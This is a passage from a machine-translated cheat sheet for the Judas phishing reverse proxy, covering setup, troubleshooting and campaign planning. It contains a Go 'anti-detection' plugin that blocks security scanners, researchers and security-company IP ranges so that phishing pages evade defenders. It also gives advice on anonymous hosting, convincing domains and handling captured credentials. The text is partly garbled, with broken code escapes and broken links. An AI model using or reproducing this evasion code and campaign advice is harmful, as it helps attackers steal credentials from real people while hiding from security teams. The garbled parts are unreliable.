2. Configure DNS records¶
3. Enable proxy (orange cloud)¶
4. Configure security settings¶
5. Point to Judas proxy¶
```_
Anti-Detektionsmaßnahmen¶
```go // Implement anti-detection in Judas plugins func (p *AntiDetectionPlugin) ProcessRequest(req *http.Request) error \\{ userAgent := req.UserAgent()
// Block security tools
securityTools := []string\\\\{
"curl", "wget", "python-requests", "scanner",
"bot", "crawler", "security", "research",
\\\\}
for _, tool := range securityTools \\\\{
if strings.Contains(strings.ToLower(userAgent), tool) \\\\{
return errors.New("blocked security tool")
\\\\}
\\\\}
// Check for known security company IP ranges
clientIP := getClientIP(req)
if isSecurityCompanyIP(clientIP) \\\\{
return errors.New("blocked security company IP")
\\\\}
return nil
\\} ```_
Fehlerbehebung¶
Gemeinsame Themen¶
```bash
Port already in use¶
sudo netstat -tulpn|grep :8080 sudo kill -9 $(sudo lsof -t -i:8080)
SSL certificate issues¶
Check certificate validity¶
openssl x509 -in cert.pem -text -noout
Target website blocking proxy¶
Use different user agents¶
Implement request delays¶
Use proxy chains¶
Plugin compilation errors¶
go mod tidy go build -o plugin.so -buildmode=plugin plugin.go ```_
Debug Mode¶
```bash
Enable verbose logging¶
judas --target https://example.com --address localhost:8080 --verbose
Check Judas logs¶
tail -f judas.log
Test proxy functionality¶
curl -v http://localhost:8080
Verify SSL configuration¶
openssl s_client -connect localhost:443 ```_
Leistungsoptimierung¶
```bash
Optimize for high traffic¶
Increase file descriptor limits¶
ulimit -n 65536
Monitor resource usage¶
htop iotop netstat -tulpn
Use connection pooling¶
Implement caching¶
Scale horizontally with load balancer¶
```_
Best Practices¶
Kampagnenplanung¶
- Zielanalyse: Ziel-Website-Struktur und Verhalten verstehen
- **Infrastruktur-Setup*: Verwenden Sie sicheres und anonymes Hosting
- Domain Auswahl: Wählen Sie überzeugende Domainnamen
- **SSL-Implementierung*: Verwenden Sie legitime SSL-Zertifikate
- **Plugin-Entwicklung*: Erstellen Sie benutzerdefinierte Plugins für spezifische Bedürfnisse
Rechtliche und ethische Überlegungen¶
```bash
Authorized testing only¶
Obtain proper written authorization¶
Follow responsible disclosure¶
Protect captured data¶
Document all activities¶
Data protection measures¶
Encrypt captured credentials¶
Secure data transmission¶
Implement data retention policies¶
Regular security audits¶
```_
Leistung und Skalierbarkeit¶
```bash
Optimize proxy performance¶
Use efficient plugins¶
Implement caching strategies¶
Monitor resource usage¶
Scale infrastructure as needed¶
Example load balancing setup¶
Use nginx or HAProxy¶
Distribute traffic across multiple Judas instances¶
Implement health checks¶
```_
Ressourcen¶
- [Judas GitHub Repository](LINK_5_ -%20Go%20Programming%20Language
- Reverse Proxy Concepts
- [OWASP Phishing Guide](LINK_5 -%20(LINK_5_)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Judas Phishing Proxy. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung haben, bevor Sie Phishing-Simulationen oder Penetrationstests durchführen. *